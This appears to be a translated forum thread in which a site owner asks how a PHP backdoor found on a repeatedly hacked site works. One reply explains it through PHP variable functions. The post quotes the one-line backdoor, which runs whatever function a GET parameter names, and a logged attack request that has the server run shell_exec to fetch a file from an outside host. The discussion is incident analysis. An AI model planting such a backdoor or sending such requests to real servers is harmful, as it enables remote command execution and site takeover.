Backdoor in php - how does it work?

C

charliez2012-10-09 13:01:50

PHP

charliez, 2012-10-09 13:01:50

For one sufferer, the site was broken every night, no matter how he restored it from backups, no matter how he updated the scripts. A friend turned to me for help, I warmed up all the scripts for all kinds of shell_exec / eval / base64_decode / preg_replace. * / e - nothing! In the access logs, I found a suspicious call to one of the scripts, looked at it - the first line was a code of the form:

&lt;?=([email protected]$_GET[c]).stripslashes(@$_($_GET[f]))?&gt;

accessed the script like this:

GET /news.php?c=shell_exec&f=fetch%20http://bitrix.metrolux******.ru/upload/to.php

Would you like to understand how it works? It is clear that dogs suppress the output of errors in the error_log. But what is responsible in this code for executing php functions? The most interesting thing is that if you remove the dogs and put print instead of shell_exec, for example, then “PHP Fatal error: Call to undefined function print()” falls into the error log, but nevertheless, shell_exec rolls without problems ...

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

V

Vitaly Peretyatko, 2012-10-09
@charliez

print() is not actually a real function (it is a language construct) - that's why you didn't get anything with print.
How does this thing work? Very simple:

[email protected]$_GET[c];
$func($_GET[f]);

It uses a feature called Variable functions

A

AGvin, 2012-10-09
@AGvin

Excuse me, but can I have a look at the ".../upload/to.php" file somehow? It's very interesting what they packed there =)